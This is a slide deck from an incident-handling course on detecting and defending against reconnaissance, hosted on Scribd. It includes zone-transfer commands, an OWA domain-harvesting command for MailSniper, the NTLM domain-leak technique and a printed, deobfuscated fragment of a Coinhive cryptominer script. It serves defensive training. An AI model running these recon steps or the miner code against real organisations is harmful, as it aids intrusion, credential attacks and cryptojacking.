Scribd
Upload
34 views60 pages

01 Preparing and Defending Against Reconnaissance and Information Gathering

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
34 views60 pages

01 Preparing and Defending Against Reconnaissance and Information Gathering

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 60

Preparing & Defending Against Reconnaissance

& Information Gathering


S e c t i o n 0 3 | M o d u l e 0 1
© Caendra Inc. 2019
All Rights Reserved
Table of Contents

Module 01 | Preparing & Defending Against


Reconnaissance & Information Gathering

1.1 Reconnaissance/Information Gathering: Definition

1.2 Reconnaissance Techniques & Defense

IHRPv1 - Caendra Inc. © 2019 | p.2


Learning Objectives

By the end of this module, you should have a better


understanding of:

✓ The reconnaissance/information techniques used by


attackers

✓ How to prepare and defend against


reconnaissance/information gathering activities

IHRPv1 - Caendra Inc. © 2019 | p.3


1.1

Reconnaissance / Information
Gathering: Definition

IHRPv1 - Caendra Inc. © 2019 | p.4


1.1 Reconnaissance/Information Gathering: Definition

At the end of the Incident


Handling Process module we
mentioned that we will cover how
2
to prepare and defend against all Scanning

phases of the cyber kill chain. 1 4


3

That being said, the cyber kill


chain can be a little confusing for
newcomers, so we will group
attacker actions as follows.

https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html IHRPv1 - Caendra Inc. © 2019 | p.5


1.1 Reconnaissance/Information Gathering: Definition

As you can imagine, even inexperienced attackers will not


start throwing exploits against your external or internal
assets before they gather as much information as possible
about your network.

It is a known fact that a well-prepared attack is most likely


to result in a breach.

IHRPv1 - Caendra Inc. © 2019 | p.6


1.1 Reconnaissance/Information Gathering: Definition

Unfortunately, the Internet contains massive volumes of


information about organizations and their employees. Prior
to an attack, malicious actors thoroughly collect (and
analyze) such information from multiple open sources, in
order to maximize the chances of a successful breach.

IHRPv1 - Caendra Inc. © 2019 | p.7


1.1 Reconnaissance/Information Gathering: Definition

The collection (and analysis) of information from open


sources about an organization and its employees prior to
an attack, is known as “The Reconnaissance / Information
Gathering Phase”.

From here on we will refer to The Reconnaissance /


Information Gathering Phase as Reconnaissance.

IHRPv1 - Caendra Inc. © 2019 | p.8


1.1 Reconnaissance/Information Gathering: Definition

Let’s now cover the most common reconnaissance


techniques used by attackers and see how we can prepare
and defend against them.

IHRPv1 - Caendra Inc. © 2019 | p.9


1.2

Reconnaissance
Techniques & Defense

IHRPv1 - Caendra Inc. © 2019 | p.10


1.2 Reconnaissance Techniques & Defense

Let’s cover the reconnaissance activities that can be performed


by attackers residing outside your network. Specifically, we’ll
cover the following reconnaissance techniques:

• Whois information analysis


• SSL certificate information analysis
• Utilization of search engines, internet-wide scanners & other
sites
• DNS interrogation
• Abusing exposed OWA
• JavaScript injection
IHRPv1 - Caendra Inc. © 2019 | p.11
1.2.1 Whois information analysis

Whenever a domain name is registered, information such


as postal addresses, phone numbers, contact names and
authoritative domain name servers are requested by the
registrar.
This information can be the starting point of attacks such
as social engineering, war dialing, war driving and network
mapping.

https://www.optiv.com/blog/war-dialing-part-1-the-voip-and-analog-primer
https://kismac-ng.org/what-is-wardriving/ IHRPv1 - Caendra Inc. © 2019 | p.12
1.2.1 Whois information analysis

Unfortunately this information can be retrieved from open


sources. Specifically, Whois databases exist throughout the
internet exposing all the records that were filled during a
domain name’s registration.

An example of such a database is


https://whois.icann.org/en

https://whois.icann.org/en IHRPv1 - Caendra Inc. © 2019 | p.13


1.2.1 Whois information analysis

You can use publicly available Whois databases or the


whois Linux command to see the information that your
organization is exposing.

https://www.unix.com/man-page/linux/1/whois/ IHRPv1 - Caendra Inc. © 2019 | p.14


1.2.1 Whois information analysis

Preparation & Defense

You can’t tell when someone is looking


at your organization’s Whois
information, but you can be proactive
by closely monitoring the submitted
contact email and DNS server(s).

You can also defend against ill-


intended Whois lookups by purchasing
a Whois privacy service that many
registrars offer. On your right you can
see an example of such a service.

IHRPv1 - Caendra Inc. © 2019 | p.15


1.2.1 Whois information analysis

Looking up and analyzing Whois information, is a


reconnaissance technique that does not involve even a
single packet being sent from the attacker to the targeted
organization’s network. Such reconnaissance is known as
passive reconnaissance.

Passive reconnaissance techniques are particularly


interesting due to the fact that they cannot be detected.

IHRPv1 - Caendra Inc. © 2019 | p.16


1.2.2 SSL certificate information analysis

Another passive reconnaissance technique you should be aware


of, is gathering and analyzing SSL certificate information.

By analyzing a SSL certificate an attacker can:


• Sketch a picture of an organization’s network layout (by checking the
subdomains that could appear in the CN’s)

• Identify provided services (by analyzing the subdomain names)


• Identify critical assets (critical assets are always SSL-protected)
• Identify internal host names, IPs or alternative DNS servers

IHRPv1 - Caendra Inc. © 2019 | p.17


1.2.2 SSL certificate information analysis

You should also know about the Certificate


Transparency initiative. This initiative enables detecting
SSL certificates that have been mistakenly issued by a
certificate authority or have been maliciously acquired. It
also makes it possible to identify certificate authorities that
have gone rogue and are maliciously issuing certificates.

https://www.certificate-transparency.org/ IHRPv1 - Caendra Inc. © 2019 | p.18


1.2.2 SSL certificate information analysis

Why are we mentioning the Certificate Transparency


initiative you may ask.

In the past, SSL certificate information was still publicly


available through published results of internet wide scans.
Obviously, internet wide scans could only catalog SSL
certificate information of publicly reachable web sites.
What Certificate Transparency could accidentally bring to
light are names intended for internal use only.

https://scans.io/ IHRPv1 - Caendra Inc. © 2019 | p.19


1.2.2 SSL certificate information analysis

Find below an example of passive subdomain enumeration


by analyzing SSL certificate information. By checking each
of those entries, one could also identify host names of
intranet machines.

IHRPv1 - Caendra Inc. © 2019 | p.20


1.2.2 SSL certificate information analysis

Preparation & Defense

Once again, you can’t tell when someone is


going through your organization’s SSL
certificate information.

You can be proactive though, by requesting


and analyzing all the information included in
your organization’s SSL certificates.

In addition, a great example of how you can


check for sensitive information inside your
organization’s SSL certificates from an
attacker’s perspective is Censys.

https://censys.io/certificates?q= IHRPv1 - Caendra Inc. © 2019 | p.21


1.2.2 SSL certificate information analysis

Preparation & Defense

Other publicly available sources to passively gather and


analyze SSL certificate information are:
• https://crt.sh/
• https://developers.facebook.com/tools/ct/
• https://www.google.com/transparencyreport/https/ct/

IHRPv1 - Caendra Inc. © 2019 | p.22


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

To conclude covering the passive reconnaissance


techniques being used by attackers, let’s see how they
leverage search engines, internet-wide scanners & other
sites to gather critical information about an organization.

IHRPv1 - Caendra Inc. © 2019 | p.23


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Let’s start with search engines. Attackers leverage the


extended visibility and features of search engines to
perform passive reconnaissance activities.

Specifically, they are leveraging search engine directives


and operators for targeted searches. What they also
leverage is the cache functionality to retrieve deleted
information.

IHRPv1 - Caendra Inc. © 2019 | p.24


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Preparation & Defense


Similarly to the other passive reconnaissance techniques,
you can’t detect an attacker searching for information
about your organization through search engines. What you
can do though, is mimic the way attackers use search
engines for reconnaissance purposes to identify critical
information that your organization may be exposing.

Find below a great resource on how to do so.


http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf
IHRPv1 - Caendra Inc. © 2019 | p.25
1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Preparation & Defense

What you can also do, is minimize the information your


organization is exposing through search engines. You can
refer to the following resources on how to do so.
• http://web.archive.org/web/20050830204837/google.co
m/remove.html
• https://support.google.com/webmasters/answer/16634
19?hl=en
IHRPv1 - Caendra Inc. © 2019 | p.26
1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Preparation & Defense

Notes:
1. Instead of the cache functionality of search engines,
attackers are also known to use http://web.archive.org/
2. Some of the directives that you saw on the Google
hacking resource also apply on other search engines
3. Automated penetration testing tools that leverage
search engines for reconnaissance are: Recon-ng and
SearchDiggity
https://bitbucket.org/LaNMaSteR53/recon-ng
https://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/
IHRPv1 - Caendra Inc. © 2019 | p.27
1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Internet-wide “scanners” like Shodan or Censys are also


heavily utilized by attackers. Such services scan the whole
internet and can provide attackers with critical information
about an organization’s IP blocks, exposed services/web
servers (including their version), utilized technology etc.

Armed with such knowledge attackers can passively


identify vulnerable systems exposed on the internet.

https://www.shodan.io/ IHRPv1 - Caendra Inc. © 2019 | p.28


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

A nice example of Shodan usage is the below:


https://searchnetworking.techtarget.com/tip/How-to-use-
Shodan-search-engine-to-diagnose-vulnerabilities

Shodan’s REST API documentation contains all the


information you will need to construct more advanced /
targeted queries:
https://developer.shodan.io/api
https://searchnetworking.techtarget.com/tip/How-to-use-Shodan-search-engine-to-diagnose-vulnerabilities
https://developer.shodan.io/api
IHRPv1 - Caendra Inc. © 2019 | p.29
1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Preparation & Defense

The solution to prepare and defend against internet-wide


“scanners” is, once again, to proactively check for critical
information being exposed by them and also limit the
amount of information being exposed.

IHRPv1 - Caendra Inc. © 2019 | p.30


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

There is no doubt that phishing remains the top threat


vector for cyber attacks. Attacking the human factor
continues to be the most attractive and successful path for
gaining an initial foothold.

IHRPv1 - Caendra Inc. © 2019 | p.31


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

A successful phishing attack requires a target and a good


social engineering pretext. Both can unfortunately be
obtained through open sources.

IHRPv1 - Caendra Inc. © 2019 | p.32


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

You organization’s own website may include employee


information (including e-mail addresses). Even if it doesn’t,
an organization’s employees and their day to day activities
can be identified through networking sites such LinkedIn,
Facebook, Twitter etc., or databases like pipl.com.

IHRPv1 - Caendra Inc. © 2019 | p.33


1.2.3 Utilization of search engines, internet-wide scanners
& other sites

Preparation & Defense

There is little you can do about employees sharing their


company position or whereabouts. You could try enforcing
a stricter information sharing policy and educate them on
social engineering and the dangers of phishing attacks.

IHRPv1 - Caendra Inc. © 2019 | p.34


1.2.4 DNS interrogation

The Domain Name System can provide useful information


about an organization. Most of the times attackers will try
to dump all records from a DNS server through zone
transfers. This way, they can identify internet-reachable
machines.

IHRPv1 - Caendra Inc. © 2019 | p.35


1.2.4 DNS interrogation

Preparation & Defense


To prepare against DNS-based reconnaissance you can:

• Configure the primary DNS server so that it accepts zone requests by secondary
and tertiary DNS servers only
• Use split DNS
• Thoroughly harden every DNS server
• Proactively attempt a zone transfer
o dig @[DNS_server_IP] [target_domain] –t AXFR
o nslookup
> server [authoritative_server_IP_or_name]
> set type=any
> ls –d [target_domain]
IHRPv1 - Caendra Inc. © 2019 | p.36
1.2.4 DNS interrogation

Preparation & Defense

As for detecting DNS-based reconnaissance, we have already


covered how zone transfers look like on the wire in Section 1.

IHRPv1 - Caendra Inc. © 2019 | p.37


1.2.5 Abusing exposed OWA

Let’s continue with active reconnaissance, starting with abusing


an exposed Outlook Web Access (or App) service, to perform
domain name discovery.

Specifically, attackers can remotely identify an organization’s


Active Directory domain name by:
1. Leveraging known OWA inconsistences in terms of response
times
2. Leveraging a by-design NTLM over HTTP authentication
inefficiency

IHRPv1 - Caendra Inc. © 2019 | p.38


1.2.5 Abusing exposed OWA

Knowing the Active Directory domain name is critical for


attackers, since based on it they can launch password
spraying* attacks, to identify valid credentials.

* Password spraying is brute-forcing an authentication mechanism by trying different


usernames but the same password in each attempt.This way attackers avoid locking
accounts and subsequently being detected.

IHRPv1 - Caendra Inc. © 2019 | p.39


1.2.5 Abusing exposed OWA

1. Leveraging known OWA inconsistences in terms of response


times

If one tries to authenticate with an invalid domain


and an arbitrary username, the response time is going to be
predictably shorter than the one regarding a request
with a valid internal domain name and an arbitrary
username.

IHRPv1 - Caendra Inc. © 2019 | p.40


1.2.5 Abusing exposed OWA

Let’s see this inconsistency in action, using the MailSniper


penetration testing tool.

https://github.com/dafthack/MailSniper IHRPv1 - Caendra Inc. © 2019 | p.41


1.2.5 Abusing exposed OWA

An attacker, will first need a list of random


domain names and a list of likely to be valid
domain names (so that the baseline
response time can be calculated). This can
be done with MailSniper as follows.

>> Import-Module .\MailSniper.ps1

>> Invoke-DomainHarvestOWA
–ExchHostname mail.domain.com –OutFile
potential_domains.txt –CompanyName
"Target Name"

See an example of an attacker trying to


identify the internal domain name of “ELS
Company” on your right

IHRPv1 - Caendra Inc. © 2019 | p.42


1.2.5 Abusing exposed OWA

Preparation & Defense

To prepare against such reconnaissance activities, you can make


a list of domain names similar to the one of your organization
and configure an alert every time an OWA request contains any
of the domain names in that list.

You can also introduce a threshold regarding consecutive (or


relatively close in terms of time) and unsuccessful OWA login
requests and configure an alert every time this threshold is
exceeded.
IHRPv1 - Caendra Inc. © 2019 | p.43
1.2.5 Abusing exposed OWA

Preparation & Defense

Note:
A similar inconsistency can be met if someone compares the
response times of an OWA request with the correct domain name
and a non-existing username and an OWA request with the
correct domain name and an existing username.

IHRPv1 - Caendra Inc. © 2019 | p.44


1.2.5 Abusing exposed OWA

2. Leveraging a by-design NTLM over HTTP authentication


inefficiency

By default, OWA installations contain some IIS file paths that


support NTLM (NTLM over HTTP). If one sends a specifically
crafted authentication request towards any of those IIS file paths,
the response will include a Base64-encoded string that contains
the Active Directory domain name. This happens not due to a
misconfiguration but because of the way NTLM works.

https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm IHRPv1 - Caendra Inc. © 2019 | p.45


1.2.5 Abusing exposed OWA

An attacker, will first send a request to an exposed


OWA IIS file path that supports NTLM over HTTP
(/autodiscover/autodiscover.xml in the example on
your right). The Authorization header’s content
should be specifically crafted (you can use the
header content you see on your right if you want to
try this yourself).

The response will include a header named WWW-


Authenticate. This header’s content contains a
Base64-encoded string.
Active Directory
If the attacker Base64-decodes the abovementioned
string he/she will see the Active Directory domain Domain Name
name in clear text (among other information).

IHRPv1 - Caendra Inc. © 2019 | p.46


1.2.5 Abusing exposed OWA

Preparation & Defense

To prepare against such reconnaissance activities, you can


monitor the OWA IIS file paths that support NTLM over HTTP.

Examples:
• /Autodiscover/Autodiscover.xml
• /EWS/Exchange.asmx

IHRPv1 - Caendra Inc. © 2019 | p.47


1.2.6 JavaScript injection

The final active reconnaissance technique we will cover is


reconnaissance through JavaScript injection.

Attackers are known for leveraging Cross-site Scripting


vulnerabilities to inject malicious JavaScript code into otherwise
benign and trusted websites. While cross-site scripting
vulnerabilities are usually leveraged to attack a user’s session,
they can also be leveraged for reconnaissance and information
gathering purposes.

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) IHRPv1 - Caendra Inc. © 2019 | p.48


1.2.6 JavaScript injection

A nice case to study in order to understand how cross-site


vulnerabilities can be leveraged for reconnaissance and
information gathering purposes is the Browser Exploitation
Framework Project (BeEF). BeEF is a penetration testing tool that
heavily utilizes client-side attack vectors.

Specifically,
https://github.com/beefproject/beef/wiki/Information-Gathering
contains exactly how BeEF utilizes JavaScript code to perform
information gathering / reconnaissance.

https://github.com/beefproject/beef IHRPv1 - Caendra Inc. © 2019 | p.49


1.2.6 JavaScript injection

Preparation & Defense


An attacker will usually identify a cross-site scripting
vulnerability in an organization’s (trusted) website
and leverage it in order to inject JavaScript code to
gather information. This will be done in the form of a
(specifically crafted) URL that will be sent to a
intranet user.

As you can imagine incident responders will be able


to retrieve and analyze every piece of JavaScript
code that was loaded, if the organization has an
traffic capturing capability in place.

Note that oftentimes the injected JavaScript code


will be obfuscated to evade detection. De-
The image above depicts an example of BeEF’s JavaScript code that tries
obfuscation of JavaScript code is usually feasible to identify if Google Desktop is installed on the victim’s machine.
though.

IHRPv1 - Caendra Inc. © 2019 | p.50


1.2.6 JavaScript injection

Preparation & Defense

Before we conclude this module, let’s see how obfuscated JavaScript


code looks like.

Consider the analyze.js file included in this module’s resources.

If you take a quick look at it, you will notice the below.

atob is used in JavaScript to perform Base64-decoding.


IHRPv1 - Caendra Inc. © 2019 | p.51
1.2.6 JavaScript injection

Preparation & Defense

If we Base64-decode the Base64-encoded string and start


analyzing it from the bottom up, we will come across the
following pieces of code.
(window));self[_0x169f('0x98')]=self[_0x169f('0x98')]||{};self[_0x169f('0x98')][_0x169f('0x4b')]={'LIB_URL':_0x169f('0
xb2'),'ASMJS_NAME':_0x169f('0xb3'),'REQUIRES_AUTH':![],'WEBSOCKET_SHARDS':[['wss://wss.rand.com.ru:8843/']],'CAPTCHA_U
RL':'https://coinhive.com/captcha/','MINER_URL':_0x169f('0xb4'),'AUTH_URL':'https://authedmine.com/authenticate.html'}
;some_code[_0x169f('0x57')]=some_code[_0x169f('0x9f')](_0x169f('0xb5'));var harmless=new
some_code['Anonymous'](_0x169f('0xb6'),{'threads':navigator[_0x169f('0xb7')]/0x2});harmless[_0x169f('0x27')]();

Undoubtedly we are dealing with malicious JavaScript code that is related to crypto-mining.

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html IHRPv1 - Caendra Inc. © 2019 | p.52


References

IHRPv1 - Caendra Inc. © 2019 | p.53


References
cyber kill chain
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

war dialing
https://www.optiv.com/blog/war-dialing-part-1-the-voip-and-analog-primer

war driving
https://kismac-ng.org/what-is-wardriving/

ICANN WHOIS
https://whois.icann.org/en

IHRPv1 - Caendra Inc. © 2019 | p.54


References
whois
https://www.unix.com/man-page/linux/1/whois/

Certificate Transparency
https://www.certificate-transparency.org/

Internet-wide Scan Data Repository


https://scans.io/

Censys
https://censys.io/certificates?q=

IHRPv1 - Caendra Inc. © 2019 | p.55


References
Certificate Search
https://crt.sh/

Facebook for developers


https://developers.facebook.com/tools/ct/

Transparency Report: HTTPS encryption on the web


https://www.google.com/transparencyreport/https/ct

Google Hacking for Penetration Testers


http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf

IHRPv1 - Caendra Inc. © 2019 | p.56


References
Remove Content from Google’s Index
http://web.archive.org/web/20050830204837/google.com/remove.html

Remove URLs Tool: Temporarily Block Search Results from Sites that you
Own
https://support.google.com/webmasters/answer/1663419?hl=en

Internet Archive
http://web.archive.org/

Recon-ng
https://bitbucket.org/LaNMaSteR53/recon-ng

IHRPv1 - Caendra Inc. © 2019 | p.57


References
SearchDiggity
https://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/

Shodan
https://www.shodan.io/

How to use Shodan Search Engine to Diagnose Vulnerabilities


https://searchnetworking.techtarget.com/tip/How-to-use-Shodan-search-engine-to-diagnose-
vulnerabilities

Shodan Developer: REST API Documentation


https://developer.shodan.io/api

IHRPv1 - Caendra Inc. © 2019 | p.58


References
MailSniper
https://github.com/dafthack/MailSniper

NTLM
https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm

Cross-site Scripting vulnerabilities


https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Browser Exploitation Framework Project


https://github.com/beefproject/beef

IHRPv1 - Caendra Inc. © 2019 | p.59


References
beefproject – beef – Information Gathering
https://github.com/beefproject/beef/wiki/Information-Gathering

JavaScript code that is related to crypto-mining


https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-
infection.html

IHRPv1 - Caendra Inc. © 2019 | p.60

You might also like